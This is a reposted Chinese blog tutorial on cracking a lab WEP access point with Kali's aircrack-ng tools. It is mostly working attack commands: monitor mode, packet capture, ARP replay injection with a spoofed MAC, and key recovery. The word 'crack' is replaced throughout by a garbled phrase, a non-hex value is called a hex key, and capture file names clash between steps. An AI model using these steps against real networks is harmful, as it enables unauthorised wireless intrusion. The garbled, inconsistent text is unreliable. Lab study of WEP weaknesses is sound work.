kali WEP 激活成功教程[通俗易懂]

kali WEP 激活成功教程[通俗易懂]1.先登录AP,在WLAN配置里将网络认证方式设置为WEP。将密钥长度设置为128bit。并将16进制值123456789qwer设置为128位的WEP密钥。2.iwconfig(此命令用于检测网卡是否存在)。如下图所示。...

1.先登录AP,在 WLAN 配置里将网络认证方式设置为 WEP。将密钥长度设置为 128bit 。并将16进制值 123456789qwer 设置为 128 位的 WEP 密钥。                                                                     ace31d1852d7429cbe01376e676dff1a.png 

 

2. iwconfig         (此命令用于检测网卡是否存在)  。如下图所示。                                                   3. 在 kali 输入:  ifconfig  wlan0  up        (此命令用于激活网卡) 。如下图所示。                                4. airmon-ng  start  wlan0        (打开 kali无线网卡 监控模式) 。如下图所示。                                5. 在 kail 里输入:    airodump-ng  wlan0mon     (此命令用于扫描和嗅探周围无线网络信息)。如下图所示 。                                                       d3dc1bf34c2e4b01a3e490a65e17428f.png

 

6. 在 kali 输入: airodump-ng  --bssid  实验路由器MAC  --channel  10  --write WPACrackingDemo  wlan0mon      (此命用用于扫描哪些设备连接了实验路由器mac,并跟据实验路由器 信道  锁定kali 网卡信道,并将抓到的数据包存进 WPACrackingDemo-04.cap 里)。如下图图1所示。  

7. 让任意一台无线客户端连接 AP 会显示 无线客户端已连接AP 的画面,如图2所示。        3d65306b4ff74e4eaca8ea673d6aed66.png

 

8. 新开一个窗口并root。输入: ls    (用于查看转储流量的 WPACrackingDemo-04.cap 文件)          b1459041bbfd426180db2682ea8b1df4.png    

 9. 在 kali 输入: aireplay-ng  -3  -b  实验路由器MAC地址  -h   伪造的MAC地址  wlan0mon            (此命令用于生成大量以相同密钥加密的数据包,抓取无线网络中的ARP数据包,再将其回灌网络来模拟ARP响应)。          c                                                                                                                    6baecf720fb7472babefdaaebcdc89bb.png

 

 10. 在kali 输入: aircrack-ng   -w /usr/share/wordlists/nmap.lst  WEPCrackingDemo-04.cap            (此命令用于以抓到的大量响应包来破WEP密钥,-w 后面是用于激活成功教程密码的 字典路径)。               激活成功教程结果如下图。 (紫色下划线部份是激活成功教程的密钥, 红色下划线部份是激活成功教程的密码)。                                                                                                                               bc2b5e9c8760447393dab8164e3e3f53.png

 

本文来源北城慕雪,由架构君转载发布,观点不代表Java架构师必看的立场,转载请标明来源出处:https://javajgs.com/archives/209841
0
   

发表评论